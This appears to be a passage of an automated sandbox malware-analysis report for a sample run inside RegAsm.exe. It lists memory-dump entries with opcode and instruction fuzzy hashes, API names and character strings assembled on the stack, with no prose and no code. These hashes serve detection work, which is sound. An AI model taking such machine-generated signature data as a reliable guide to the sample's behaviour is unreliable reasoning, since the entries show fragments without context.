                                                                                                        • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                        • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                        • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                                                                        • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                                                                        • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                                        • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                                                                                        • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                                                                        • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                                        • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                                                                                        • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                                                                        • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                                        • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                                                                                        • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                                                                        • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                        • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                                                                        • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                        • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                        • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                                        • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                        • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                        • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                        • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                        • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                        • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                                        • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                        • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                        • API String ID: 2525500382-534244583
                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                        • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                        • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString
                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                        • API String ID: 2525500382-534244583
                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                        • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                        • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit
                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                        • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                        • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit
                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                        • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                        • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitVariant
                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                        • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                        • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                        • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                        • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitVariant
                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                        • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                        • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                        • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                        • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit
                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                        • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                        • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763